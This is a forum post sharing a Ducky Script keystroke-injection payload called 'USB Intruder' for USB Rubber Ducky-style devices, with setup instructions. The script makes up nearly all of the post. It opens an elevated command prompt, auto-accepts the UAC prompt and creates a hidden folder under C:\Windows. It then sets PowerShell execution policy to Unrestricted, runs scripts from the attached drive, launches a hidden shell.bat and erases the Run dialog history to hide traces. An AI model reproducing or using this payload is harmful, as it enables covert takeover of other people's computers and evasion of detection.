Jump to content

[PAYLOAD] USB Intruder


B0rk

Recommended Posts

Hello all,

I am posting the Ducky Script for the USB Intruder I made available on the BashBunny. If you would like to run USB Intruder on the TwinDuck FW, you will need to download the BashBunny payloads from Github and delete the payload.txt from the USB_Intruder payload folder and replace it with the following code for the inject.bin file. I'm being lazy on this post, so if you want more information on it, check the readme.md from my BB Payload. You will also need to name the storage "Ducky" (minus the quotes) in order for this payload to execute properly.

DELAY 2000
GUI d
DELAY 100
GUI r
DELAY 500
STRING powershell -Command "Start-Process cmd -Verb RunAs"
ENTER
DELAY 1000
ALT y
DELAY 800
STRING mkdir C:\Windows\ProgData
ENTER
STRING attrib +h C:\Windows\ProgData
ENTER
STRING powershell
ENTER
DELAY 800
STRING Set-ExecutionPolicy Unrestricted
ENTER
STRING powershell ".((gwmi win32_volume -f 'label=''Ducky''').Name+'\d.cmd')"
ENTER
DELAY 2000
STRING cd $Env:WinDir\ProgData
ENTER
STRING .\seq1.ps1
ENTER
DELAY 1000
STRING powershell -WindowStyle Hidden $Env:WinDir\ProgData\shell.bat
ENTER
STRING exit
ENTER
STRING exit
ENTER
DELAY 500
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
ENTER

 

Edited by B0rk
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...